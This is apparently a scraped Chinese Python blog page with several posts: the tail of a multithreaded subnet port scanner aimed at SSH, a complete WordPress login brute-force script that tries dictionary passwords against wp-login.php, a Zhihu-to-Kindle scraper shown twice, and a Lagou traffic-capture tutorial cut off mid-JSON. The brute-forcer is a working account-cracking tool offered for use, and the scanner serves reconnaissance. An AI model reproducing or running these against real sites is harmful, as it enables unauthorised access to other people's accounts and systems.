def scan(ip_head, ip_low, port):
    try:
        # Alert !!! below statement should be inside scan function. Else each it is one s
        ip = ip_head + str(ip_low)
        print ip
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        # 通过这一句判断 是否连通
        s.close()
        print "ip %s port %d open\n" % (ip, port)
        return True
    except:
        return False


def scan_range(ip_head, ip_range, port):
    start, end = ip_range
    for i in range(start, end):
        scan(ip_head, i, port)

if len(sys.argv) < 3:
    print "input ip and port"
    exit()

ip_head = sys.argv[1]
port = int(sys.argv[2])


ip_range = []
for i in range(thread_num):
    x_range = [i * scope, (i + 1) * scope - 1]
    ip_range.append(x_range)

threads = []
for i in range(thread_num):
    # 每个线程负责扫描 ip_range[i] 这一段
    t = MyThread(scan_range, (ip_head, ip_range[i], port))
    threads.append(t)
for i in range(thread_num):
    threads[i].start()
for i in range(thread_num):
    threads[i].join()
    # 设置进程阻塞,防止主线程退出了,其他的多线程还在运行

print "*****end*****"
多线程的类实现如下。有一些测试函数没有注释掉或删除,是为了让初学者更容易看懂。
import thread, threading, time, datetime
from time import sleep, ctime

def loop1():
    print "start %s " % ctime()
    print "start in loop1"
    sleep(3)
    print "end %s " % ctime()

def loop2():
    print "sart %s " % ctime()
    print "start in loop2"
    sleep(6)
    print "end %s " % ctime()


class MyThread(threading.Thread):
    def __init__(self, fun, arg, name=""):
        threading.Thread.__init__(self)
        self.fun = fun
        self.arg = arg
        self.name = name
        # self.result

    def run(self):
        self.result = apply(self.fun, self.arg)

    def getResult(self):
        return self.result

def fib(n):
    if n < 2:
        return 1
    else:
        return fib(n - 1) + fib(n - 2)


def sum(n):
    if n < 2:
        return 1
    else:
        return n + sum(n - 1)

def fab(n):
    if n < 2:
        return 1
    else:
        return n * fab(n - 1)

def single_thread():
    print fib(12)
    print sum(12)
    print fab(12)


def multi_thread():
    print "in multithread"
    fun_list = [fib, sum, fab]
    n = len(fun_list)
    threads = []
    count = 12
    for i in range(n):
        # 按列表索引取出对应的函数,创建线程
        t = MyThread(fun_list[i], (count,), fun_list[i].__name__)
        threads.append(t)
    for i in range(n):
        threads[i].start()

    for i in range(n):
        threads[i].join()
        result = threads[i].getResult()
        print result

def main():
    '''
    print "start at main"
    thread.start_new_thread(loop1,())
    thread.start_new_thread(loop2,())
    sleep(10)
    print "end at main"
    '''
    start = ctime()
    # print "Used %f" %(end-start).seconds
    print start
    single_thread()
    end = ctime()
    print end
    multi_thread()
    # print "used %s" %(end-start).seconds

if __name__ == "__main__":
    main()

 
最终运行的格式就是  python scan_host.py 192.168.1. 22
上面的命令就是扫描192.168.1 ip段开启了22端口服务的机器,也就是ssh服务。 
 
github:https://github.com/Rockyzsu/scan_host​ 

 

python 暴力破解wordpress博客后台登陆密码

python爬虫低调的哥哥 发表了文章 • 0 个评论 • 23818 次浏览 • 2016-05-13 17:49 • 来自相关话题

自己曾经折腾过一阵子wordpress的博客,说实话,wordpress在博客系统里面算是功能很强大的了,没有之一。
不过用wordpress的朋友可能都是贪图方便,很多设置都使用的默认,我之前使用的某一个wordpress版本中,它的后台没有任何干扰的验证码(因为它默认给用户关闭了,需要自己去后台开启,一般用户是使用缺省设置)。
 

(图:wordpress后台.PNG)


所以只要使用python+urllib库,就可以循环枚举出用户的密码。而用户名在wordpress博客中就是博客发布人的名字。
 
所以以后用wordpress的博客用户,平时还是把图片验证码的功能开启,这样安全性会高很多。(其实python也有识别验证码的库 - 。-!)
# coding=utf-8
# 破解wordpress 后台用户密码
import urllib, urllib2, time, re, cookielib,sys


class wordpress():
def __init__(self, host, username):
#初始化定义 header ,避免被服务器屏蔽
self.username = username
self.http="http://"+host
self.url = self.http + "/wp-login.php"
self.redirect = self.http + "/wp-admin/"
self.user_agent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
self.referer=self.http+"/wp-login.php"
self.cook="wordpress_test_cookie=WP+Cookie+check"
self.host=host
self.headers = {'User-Agent': self.user_agent,"Cookie":self.cook,"Referer":self.referer,"Host":self.host}
self.cookie = cookielib.CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))


def crash(self, filename):
try:
pwd = open(filename, 'r')
#读取密码文件,密码文件中密码越多破解的概率越大
while 1 :
i=pwd.readline()
if not i :
break

data = urllib.urlencode(
{"log": self.username, "pwd": i.strip(), "testcookie": "1", "redirect_to": self.redirect})
Req = urllib2.Request(url=self.url, data=data, headers=self.headers)
#构造好数据包之后提交给wordpress网站后台
Resp = urllib2.urlopen(Req)
result = Resp.read()
# print result
login = re.search(r'login_error', result)
#判断返回来的字符串,如果有login error说明失败了。
if login:
pass
else:
print "Crashed! password is %s %s" % (self.username,i.strip())
g=open("wordpress.txt",'w+')
g.write("Crashed! password is %s %s" % (self.username,i.strip()))
pwd.close()
g.close()
#如果匹配到密码, 则这次任务完成,退出程序
exit()
break

pwd.close()

except Exception, e:
print "error"
print e
print "Error in reading password"


if __name__ == "__main__":
print "begin at " + time.ctime()
host=sys.argv[1]
#url = "http://"+host
#给程序提供参数,为你要破解的网址
user = sys.argv[2]
dictfile=sys.argv[3]
#提供你事先准备好的密码文件
obj = wordpress(host, user)
#obj.check(dictfile)
obj.crash(dictfile)
#obj.crash_v()
print "end at " + time.ctime()





 
github源码:https://github.com/Rockyzsu/crashWordpressPassword
 

python爬虫 模拟登陆知乎 推送知乎文章到kindle电子书 获取自己的关注问题

python爬虫低调的哥哥 发表了文章 • 0 个评论 • 37740 次浏览 • 2016-05-12 17:53 • 来自相关话题

平时逛知乎,上班的时候看到一些好的答案,不过由于答案太长,没来得及看完,所以自己写了个python脚本,把自己想要的答案抓取下来,并且推送到kindle上,下班后用kindle再慢慢看。 平时喜欢的内容也可以整理成电子书抓取下来,等周末闲时看。
 
#2016-08-19更新:
添加了模拟登陆知乎的模块,自动获取自己关注的问题id,然后把这些问题的所有答案抓取下来推送到kindle。











# -*-coding=utf-8-*-
__author__ = 'Rocky'
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import smtplib
from email import Encoders, Utils
import urllib2
import time
import re
import sys
import os

from bs4 import BeautifulSoup

from email.Header import Header

reload(sys)
sys.setdefaultencoding('utf-8')


class GetContent():
    def __init__(self, id):

        # 给出的第一个参数 就是你要下载的问题的id
        # 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574
        # 那么 就输入 python zhihu.py 29372574

        id_link = "/question/" + id
        self.getAnswer(id_link)

    def save2file(self, filename, content):
        # 保存为电子书文件
        filename = filename + ".txt"
        f = open(filename, 'a')
        f.write(content)
        f.close()

    def getAnswer(self, answerID):
        host = "http://www.zhihu.com"
        url = host + answerID
        print url
        user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
        # 构造header 伪装一下
        header = {"User-Agent": user_agent}
        req = urllib2.Request(url, headers=header)

        try:
            resp = urllib2.urlopen(req)
        except:
            print "Time out. Retry"
            time.sleep(30)
            # try to switch with proxy ip
            resp = urllib2.urlopen(req)
        # 这里已经获取了 网页的代码,接下来就是提取你想要的内容。 使用beautifulSoup 来处理,很方便
        try:
            bs = BeautifulSoup(resp)

        except:
            print "Beautifulsoup error"
            return None

        title = bs.title
        # 获取的标题

        filename_old = title.string.strip()
        print filename_old
        filename = re.sub('[\/:*?"<>|]', '-', filename_old)
        # 用来保存内容的文件名,因为文件名不能有一些特殊符号,所以使用正则表达式过滤掉

        self.save2file(filename, title.string)

        detail = bs.find("div", class_="zm-editable-content")

        self.save2file(filename, "\n\n\n\n--------------------Detail----------------------\n\n")
        # 获取问题的补充内容

        if detail is not None:
            for i in detail.strings:
                self.save2file(filename, unicode(i))

        answer = bs.find_all("div", class_="zm-editable-content clearfix")
        k = 0
        index = 0
        for each_answer in answer:

            self.save2file(filename, "\n\n-------------------------answer %s via -------------------------\n\n" % k)

            for a in each_answer.strings:
                # 循环获取每一个答案的内容,然后保存到文件中
                self.save2file(filename, unicode(a))
            k += 1
            index = index + 1

        smtp_server = 'smtp.126.com'
        from_mail = 'your@126.com'
        password = 'yourpassword'
        to_mail = 'yourname@kindle.cn'

        # send_kindle=MailAtt(smtp_server,from_mail,password,to_mail)
        # send_kindle.send_txt(filename)

        # 调用发送邮件函数,把电子书发送到你的kindle用户的邮箱账号,这样你的kindle就可以收到电子书啦
        print filename


class MailAtt():
    def __init__(self, smtp_server, from_mail, password, to_mail):
        self.server = smtp_server
        self.username = from_mail.split("@")[0]
        self.from_mail = from_mail
        self.password = password
        self.to_mail = to_mail

        # 初始化邮箱设置

    def send_txt(self, filename):
        # 这里发送附件尤其要注意字符编码,当时调试了挺久的,因为收到的文件总是乱码
        self.smtp = smtplib.SMTP()
        self.smtp.connect(self.server)
        self.smtp.login(self.username, self.password)
        self.msg = MIMEMultipart()
        self.msg['to'] = self.to_mail
        self.msg['from'] = self.from_mail
        self.msg['Subject'] = "Convert"
        self.filename = filename + ".txt"
        self.msg['Date'] = Utils.formatdate(localtime=1)
        content = open(self.filename.decode('utf-8'), 'rb').read()
        # print content
        self.att = MIMEText(content, 'base64', 'utf-8')
        self.att['Content-Type'] = 'application/octet-stream'
        # self.att["Content-Disposition"] = "attachment;filename=\"%s\"" %(self.filename.encode('gb2312'))
        self.att["Content-Disposition"] = "attachment;filename=\"%s\"" % Header(self.filename, 'gb2312')
        # print self.att["Content-Disposition"]
        self.msg.attach(self.att)

        self.smtp.sendmail(self.msg['from'], self.msg['to'], self.msg.as_string())
        self.smtp.quit()


if __name__ == "__main__":

    sub_folder = os.path.join(os.getcwd(), "content")
    # 专门用于存放下载的电子书的目录

    if not os.path.exists(sub_folder):
        os.mkdir(sub_folder)

    os.chdir(sub_folder)

    id = sys.argv[1]
    # 给出的第一个参数 就是你要下载的问题的id
    # 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574
    # 那么 就输入 python zhihu.py 29372574

    # id_link="/question/"+id
    obj = GetContent(id)
    # obj.getAnswer(id_link)

    # 调用获取函数

    print "Done"





 
#######################################
2016.8.19 更新
添加了新功能,模拟知乎登陆,自动获取自己关注的答案,制作成电子书并且发送到kindle





 # -*-coding=utf-8-*-
__author__ = 'Rocky'
import requests
import cookielib
import re
import json
import time
import os
from getContent import GetContent
agent='Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers={'Host':'www.zhihu.com',
'Referer':'https://www.zhihu.com',
'User-Agent':agent}

#全局变量
session=requests.session()

session.cookies=cookielib.LWPCookieJar(filename="cookies")

try:
session.cookies.load(ignore_discard=True)
except:
print "Cookie can't load"

def isLogin():
url='https://www.zhihu.com/settings/profile'
login_code=session.get(url,headers=headers,allow_redirects=False).status_code
print login_code
if login_code == 200:
return True
else:
return False

def get_xsrf():
url='http://www.zhihu.com'
r=session.get(url,headers=headers,allow_redirects=False)
txt=r.text
result=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>',txt)[0]
return result

def getCaptcha():
#r=1471341285051
r=(time.time()*1000)
url='http://www.zhihu.com/captcha.gif?r='+str(r)+'&type=login'

image=session.get(url,headers=headers)
f=open("photo.jpg",'wb')
f.write(image.content)
f.close()


def Login():
xsrf=get_xsrf()
print xsrf
print len(xsrf)
login_url='http://www.zhihu.com/login/email'
data={
'_xsrf':xsrf,
'password':'*',
'remember_me':'true',
'email':'*'
}
try:
content=session.post(login_url,data=data,headers=headers)
login_code=content.text
print content.status_code
#this line important ! if no status, if will fail and execute the except part
#print content.status

if content.status_code != requests.codes.ok:
print "Need to verification code !"
getCaptcha()
#print "Please input the code of the captcha"
code=raw_input("Please input the code of the captcha")
data['captcha']=code
content=session.post(login_url,data=data,headers=headers)
print content.status_code

if content.status_code==requests.codes.ok:
print "Login successful"
session.cookies.save()
#print login_code
else:
session.cookies.save()
except:
print "Error in login"
return False

def focus_question():
focus_id=
url='https://www.zhihu.com/question/following'
content=session.get(url,headers=headers)
print content
p=re.compile(r'<a class="question_link" href="/question/(\d+)" target="_blank" data-id')
id_list=p.findall(content.text)
pattern=re.compile(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>')
result=re.findall(pattern,content.text)[0]
print result
for i in id_list:
print i
focus_id.append(i)

url_next='https://www.zhihu.com/node/ProfileFollowedQuestionsV2'
page=20
offset=20
end_page=500
xsrf=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"',content.text)[0]
while offset < end_page:
#para='{"offset":20}'
#print para
print "page: %d" %offset
params={"offset":offset}
params_json=json.dumps(params)

data={
'method':'next',
'params':params_json,
'_xsrf':xsrf
}
#注意上面那里 post的data需要一个xsrf的字段,不然会返回403 的错误,这个在抓包的过程中一直都没有看到提交到xsrf,所以自己摸索出来的
offset=offset+page
headers_l={
'Host':'www.zhihu.com',
'Referer':'https://www.zhihu.com/question/following',
'User-Agent':agent,
'Origin':'https://www.zhihu.com',
'X-Requested-With':'XMLHttpRequest'
}
try:
s=session.post(url_next,data=data,headers=headers_l)
#print s.status_code
#print s.text
msgs=json.loads(s.text)
msg=msgs['msg']
for i in msg:
id_sub=re.findall(p,i)

for j in id_sub:
print j
id_list.append(j)

except:
print "Getting Error "


return id_list

def main():

if isLogin():
print "Has login"
else:
print "Need to login"
Login()
list_id=focus_question()
for i in list_id:
print i
obj=GetContent(i)

#getCaptcha()
if __name__=='__main__':
sub_folder=os.path.join(os.getcwd(),"content")
#专门用于存放下载的电子书的目录

if not os.path.exists(sub_folder):
os.mkdir(sub_folder)

os.chdir(sub_folder)

main()
 
 完整代码请猛击这里:
github: https://github.com/Rockyzsu/zhihuToKindle
  查看全部
平时逛知乎,上班的时候看到一些好的答案,不过由于答案太长,没来得及看完,所以自己写了个python脚本,把自己想要的答案抓取下来,并且推送到kindle上,下班后用kindle再慢慢看。 平时喜欢的内容也可以整理成电子书抓取下来,等周末闲时看。
 
#2016-08-19更新:
添加了模拟登陆知乎的模块,自动获取自己关注的问题id,然后把这些问题的所有答案抓取下来推送到kindle


11.PNG



kindle.JPG
# -*-coding=utf-8-*-
__author__ = 'Rocky'
# -*-coding=utf-8-*-
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import smtplib
from email import Encoders, Utils
import urllib2
import time
import re
import sys
import os

from bs4 import BeautifulSoup

from email.Header import Header

reload(sys)
sys.setdefaultencoding('utf-8')


class GetContent():
def __init__(self, id):

# 给出的第一个参数 就是你要下载的问题的id
# 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574
# 那么 就输入 python zhihu.py 29372574

id_link = "/question/" + id
self.getAnswer(id_link)

def save2file(self, filename, content):
# 保存为电子书文件
filename = filename + ".txt"
f = open(filename, 'a')
f.write(content)
f.close()

def getAnswer(self, answerID):
host = "http://www.zhihu.com"
url = host + answerID
print url
user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
# 构造header 伪装一下
header = {"User-Agent": user_agent}
req = urllib2.Request(url, headers=header)

try:
resp = urllib2.urlopen(req)
except:
print "Time out. Retry"
time.sleep(30)
# try to switch with proxy ip
resp = urllib2.urlopen(req)
# 这里已经获取了 网页的代码,接下来就是提取你想要的内容。 使用beautifulSoup 来处理,很方便
try:
bs = BeautifulSoup(resp)

except:
print "Beautifulsoup error"
return None

title = bs.title
# 获取的标题

filename_old = title.string.strip()
print filename_old
filename = re.sub('[\/:*?"<>|]', '-', filename_old)
# 用来保存内容的文件名,因为文件名不能有一些特殊符号,所以使用正则表达式过滤掉

self.save2file(filename, title.string)


detail = bs.find("div", class_="zm-editable-content")

self.save2file(filename, "\n\n\n\n--------------------Detail----------------------\n\n")
# 获取问题的补充内容

if detail is not None:

for i in detail.strings:
self.save2file(filename, unicode(i))

answer = bs.find_all("div", class_="zm-editable-content clearfix")
k = 0
index = 0
for each_answer in answer:

self.save2file(filename, "\n\n-------------------------answer %s via -------------------------\n\n" % k)

for a in each_answer.strings:
# 循环获取每一个答案的内容,然后保存到文件中
self.save2file(filename, unicode(a))
k += 1
index = index + 1

smtp_server = 'smtp.126.com'
from_mail = 'your@126.com'
password = 'yourpassword'
to_mail = 'yourname@kindle.cn'

# send_kindle=MailAtt(smtp_server,from_mail,password,to_mail)
# send_kindle.send_txt(filename)

# 调用发送邮件函数,把电子书发送到你的kindle用户的邮箱账号,这样你的kindle就可以收到电子书啦
print filename


class MailAtt():
def __init__(self, smtp_server, from_mail, password, to_mail):
self.server = smtp_server
self.username = from_mail.split("@")[0]
self.from_mail = from_mail
self.password = password
self.to_mail = to_mail

# 初始化邮箱设置

def send_txt(self, filename):
# 这里发送附件尤其要注意字符编码,当时调试了挺久的,因为收到的文件总是乱码
self.smtp = smtplib.SMTP()
self.smtp.connect(self.server)
self.smtp.login(self.username, self.password)
self.msg = MIMEMultipart()
self.msg['to'] = self.to_mail
self.msg['from'] = self.from_mail
self.msg['Subject'] = "Convert"
self.filename = filename + ".txt"
self.msg['Date'] = Utils.formatdate(localtime=1)
content = open(self.filename.decode('utf-8'), 'rb').read()
# print content
self.att = MIMEText(content, 'base64', 'utf-8')
self.att['Content-Type'] = 'application/octet-stream'
# self.att["Content-Disposition"] = "attachment;filename=\"%s\"" %(self.filename.encode('gb2312'))
self.att["Content-Disposition"] = "attachment;filename=\"%s\"" % Header(self.filename, 'gb2312')
# print self.att["Content-Disposition"]
self.msg.attach(self.att)

self.smtp.sendmail(self.msg['from'], self.msg['to'], self.msg.as_string())
self.smtp.quit()


if __name__ == "__main__":

sub_folder = os.path.join(os.getcwd(), "content")
# 专门用于存放下载的电子书的目录

if not os.path.exists(sub_folder):
os.mkdir(sub_folder)

os.chdir(sub_folder)

id = sys.argv[1]
# 给出的第一个参数 就是你要下载的问题的id
# 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574
# 那么 就输入 python zhihu.py 29372574


# id_link="/question/"+id
obj = GetContent(id)
# obj.getAnswer(id_link)

# 调用获取函数

print "Done"
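
上面这份代码抓取答案的核心,就是 BeautifulSoup 的 find_all 配合 .strings,把指定 class 的 div 里的文字一段段取出来再写进 txt。下面是一个极简的示意(html 片段是随手构造的,只用来演示这两个接口):

# -*-coding=utf-8-*-
from bs4 import BeautifulSoup

html = '<div class="zm-editable-content">答案正文<b>加粗的部分</b>结尾</div>'
bs = BeautifulSoup(html)
# find_all 按 class 找出目标 div,.strings 会把里面的文字逐段吐出来
for div in bs.find_all("div", class_="zm-editable-content"):
    for text in div.strings:
        print text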





 
#######################################
2016.8.19 更新
添加了新功能:模拟知乎登陆,自动获取自己关注的问题的答案,制作成电子书并且发送到kindle

知乎.PNG

 
# -*-coding=utf-8-*-
__author__ = 'Rocky'
import requests
import cookielib
import re
import json
import time
import os
from getContent import GetContent
agent='Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers={'Host':'www.zhihu.com',
'Referer':'https://www.zhihu.com',
'User-Agent':agent}

#全局变量
session=requests.session()

session.cookies=cookielib.LWPCookieJar(filename="cookies")

try:
session.cookies.load(ignore_discard=True)
except:
print "Cookie can't load"

def isLogin():
url='https://www.zhihu.com/settings/profile'
login_code=session.get(url,headers=headers,allow_redirects=False).status_code
print login_code
if login_code == 200:
return True
else:
return False

def get_xsrf():
url='http://www.zhihu.com'
r=session.get(url,headers=headers,allow_redirects=False)
txt=r.text
result=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>',txt)[0]
return result

def getCaptcha():
#r=1471341285051
r=(time.time()*1000)
url='http://www.zhihu.com/captcha.gif?r='+str(r)+'&type=login'

image=session.get(url,headers=headers)
f=open("photo.jpg",'wb')
f.write(image.content)
f.close()


def Login():
xsrf=get_xsrf()
print xsrf
print len(xsrf)
login_url='http://www.zhihu.com/login/email'
data={
'_xsrf':xsrf,
'password':'*',
'remember_me':'true',
'email':'*'
}
try:
content=session.post(login_url,data=data,headers=headers)
login_code=content.text
print content.status_code
#this line important ! if no status, if will fail and execute the except part
#print content.status

if content.status_code != requests.codes.ok:
print "Need to verification code !"
getCaptcha()
#print "Please input the code of the captcha"
code=raw_input("Please input the code of the captcha")
data['captcha']=code
content=session.post(login_url,data=data,headers=headers)
print content.status_code

if content.status_code==requests.codes.ok:
print "Login successful"
session.cookies.save()
#print login_code
else:
session.cookies.save()
except:
print "Error in login"
return False

def focus_question():
focus_id=[]
url='https://www.zhihu.com/question/following'
content=session.get(url,headers=headers)
print content
p=re.compile(r'<a class="question_link" href="/question/(\d+)" target="_blank" data-id')
id_list=p.findall(content.text)
pattern=re.compile(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>')
result=re.findall(pattern,content.text)[0]
print result
for i in id_list:
print i
focus_id.append(i)

url_next='https://www.zhihu.com/node/ProfileFollowedQuestionsV2'
page=20
offset=20
end_page=500
xsrf=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"',content.text)[0]
while offset < end_page:
#para='{"offset":20}'
#print para
print "page: %d" %offset
params={"offset":offset}
params_json=json.dumps(params)

data={
'method':'next',
'params':params_json,
'_xsrf':xsrf
}
#注意上面那里 post的data需要一个xsrf的字段,不然会返回403 的错误,这个在抓包的过程中一直都没有看到提交到xsrf,所以自己摸索出来的
offset=offset+page
headers_l={
'Host':'www.zhihu.com',
'Referer':'https://www.zhihu.com/question/following',
'User-Agent':agent,
'Origin':'https://www.zhihu.com',
'X-Requested-With':'XMLHttpRequest'
}
try:
s=session.post(url_next,data=data,headers=headers_l)
#print s.status_code
#print s.text
msgs=json.loads(s.text)
msg=msgs['msg']
for i in msg:
id_sub=re.findall(p,i)

for j in id_sub:
print j
id_list.append(j)

except:
print "Getting Error "


return id_list

def main():

if isLogin():
print "Has login"
else:
print "Need to login"
Login()
list_id=focus_question()
for i in list_id:
print i
obj=GetContent(i)

#getCaptcha()
if __name__=='__main__':
sub_folder=os.path.join(os.getcwd(),"content")
#专门用于存放下载的电子书的目录

if not os.path.exists(sub_folder):
os.mkdir(sub_folder)

os.chdir(sub_folder)

main()

 
 完整代码请猛击这里:
github: https://github.com/Rockyzsu/zhihuToKindle
 

Firefox抓包分析 (拉勾网抓包分析)

python爬虫低调的哥哥 发表了文章 • 16 个评论 • 19368 次浏览 • 2016-05-09 18:30 • 来自相关话题

针对一些JS动态网页,在源码中无法直接看到它的内容,可以通过抓包分析出其JSON格式的数据。网页通过这些JSON数据对内容进行填充,然后就能看到网页里显示的相关内容了。
 
使用过chrome,firefox,wireshark来抓过包,比较方便的是chrome,不需要安装第三方的其它插件,不过打开新页面的时候又要重新开一个捕捉页面,会错过一些实时的数据。 
 
wireshark需要专门掌握它自己的过滤规则,学习成本摆在那里。 
 
最好用的还是firefox+firebug第三方插件。
 
接下来以拉勾网为例。
 
打开firebug功能
 
打开 www.lagou.com,在左侧栏随便点击一个岗位,以android为例。
 

Android招聘-招聘求职信息-拉勾网.png

 
在firebug中,需要点击“网络”选项卡,然后选择XHR。
 

post.jpg

 
Post的信息就是我们需要关注的,点击post的链接
 

post_data.jpg

 
点击了Android之后,我们从浏览器上传了几个参数到拉勾的服务器:
一个是 first=true,一个是 kd=android(关键字),一个是 pn=1(page number,页码)
 
所以我们就可以模仿这一步,构造一个数据包来模拟用户的点击动作。
post_data = {'first':'true','kd':'Android','pn':'1'}

然后使用python库中最简单的requests库来提交数据,而这些数据正是抓包里看到的数据。
import requests

url = "http://www.lagou.com/jobs/posi ... ot%3B
return_data=requests.post(url,data=post_data)
print return_data.text


呐,打印出来的数据就是返回来的json数据
{"code":0,"success":true,"requestId":null,"resubmitToken":null,"msg":null,"content":{"pageNo":1,"pageSize":15,"positionResult":{"totalCount":5000,"pageSize":15,"locationInfo":{"city":null,"district":null,"businessZone":null},"result":[{"createTime":"2016-05-05 17:27:50","companyId":50889,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"和创(北京)科技股份有限公司","city":"北京","salary":"20k-35k","financeStage":"上市公司","positionId":1455217,"companyLogo":"i/image/M00/03/44/Cgp3O1ax7JWAOSzUAABS3OF0A7w289.jpg","positionFirstType":"技术","companyName":"和创科技(红圈营销)","positionAdvantage":"上市公司,持续股权激励政策,技术极客云集","industryField":"移动互联网 · 企业服务","score":1372,"district":"西城区","companyLabelList":["弹性工作","敏捷研发","股票期权","年底双薪"],"deliverCount":13,"leaderName":"刘学臣","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462440470000,"positonTypesMap":null,"hrScore":77,"flowScore":148,"showCount":6627,"pvScore":73.2258060280967,"plus":"是","businessZones":["新街口","德胜门","小西天"],"publisherId":994817,"loginTime":1462876049000,"appShow":3141,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":99,"adWord":1,"formatCreateTime":"2016-05-05","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-05 18:30:16","companyId":50889,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"和创(北京)科技股份有限公司","city":"北京","salary":"20k-35k","financeStage":"上市公司","positionId":1440576,"companyLogo":"i/image/M00/03/44/Cgp3O1ax7JWAOSzUAABS3OF0A7w289.jpg","positionFirstType":"技术","companyName":"和创科技(红圈营销)","positionAdvantage":"上市公司,持续股权激励政策,技术爆棚!","industryField":"移动互联网 · 企业服务","score":1372,"district":"海淀区","companyLabelList":["弹性工作","敏捷研发","股票期权","年底双薪"],"deliverCount":6,"leaderName":"刘学臣","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462444216000,"positonTypesMap":null,"hrScore":77,"flowScore":148,"showCount":3214,"pvScore":73.37271526202157,"plus":"是","businessZones":["双榆树","中关村","大钟寺"],"publisherId":994817,"loginTime":1462876049000,"appShow":1782,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":99,"adWord":1,"formatCreateTime":"2016-05-05","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 18:41:29","companyId":94307,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"宁波海大物联科技有限公司","city":"宁波","salary":"8k-15k","financeStage":"成长型(A轮)","positionId":1070249,"companyLogo":"image2/M00/03/32/CgqLKVXtWiuAUbXgAAB1g_5FW3Y484.png?cc=0.6152940313331783","positionFirstType":"技术","companyName":"海大物联","positionAdvantage":"一流的技术团队,丰厚的薪资回报。","industryField":"移动互联网 · 企业服务","score":1353,"district":"鄞州区","companyLabelList":["节日礼物","年底双薪","带薪年假","年度旅游"],"deliverCount":0,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462876889000,"positonTypesMap":null,"hrScore":75,"flowScore":167,"showCount":1031,"pvScore":47.6349840620252,"plus":"是","businessZones":null,"publisherId":2494230,"loginTime":1462885305000,"appShow":184,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"18:41发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 
17:57:43","companyId":89004,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"学历不限","jobNature":"全职","companyShortName":"温州康宁医院股份有限公司","city":"杭州","salary":"10k-20k","financeStage":"上市公司","positionId":1387825,"companyLogo":"i/image/M00/02/C2/CgqKkVabp--APWTjAACHHJJxyPc207.png","positionFirstType":"技术","companyName":"的的心理","positionAdvantage":"上市公司内部创业项目。优质福利待遇+期权","industryField":"移动互联网 · 医疗健康","score":1344,"district":"江干区","companyLabelList":["年底双薪","股票期权","带薪年假","招募合伙人"],"deliverCount":5,"leaderName":"杨怡","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462874263000,"positonTypesMap":null,"hrScore":74,"flowScore":153,"showCount":1312,"pvScore":66.87818057124453,"plus":"是","businessZones":["四季青","景芳"],"publisherId":3655492,"loginTime":1462873104000,"appShow":573,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"17:57发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 13:49:47","companyId":15071,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"杭州短趣网络传媒技术有限公司","city":"杭州","salary":"10k-20k","financeStage":"成长型(A轮)","positionId":1803257,"companyLogo":"image2/M00/0B/80/CgpzWlYYse2AJgc0AABG9iSEWAE052.jpg","positionFirstType":"技术","companyName":"短趣网","positionAdvantage":"高额项目奖金,行业内有竞争力的薪资水平","industryField":"移动互联网 · 社交网络","score":1343,"district":null,"companyLabelList":["绩效奖金","年终分红","五险一金","通讯津贴"],"deliverCount":1,"leaderName":"王强宇","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":28,"imstate":"today","createTimeSort":1462859387000,"positonTypesMap":null,"hrScore":68,"flowScore":178,"showCount":652,"pvScore":32.82081357576065,"plus":"否","businessZones":null,"publisherId":4362468,"loginTime":1462870318000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"13:49发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 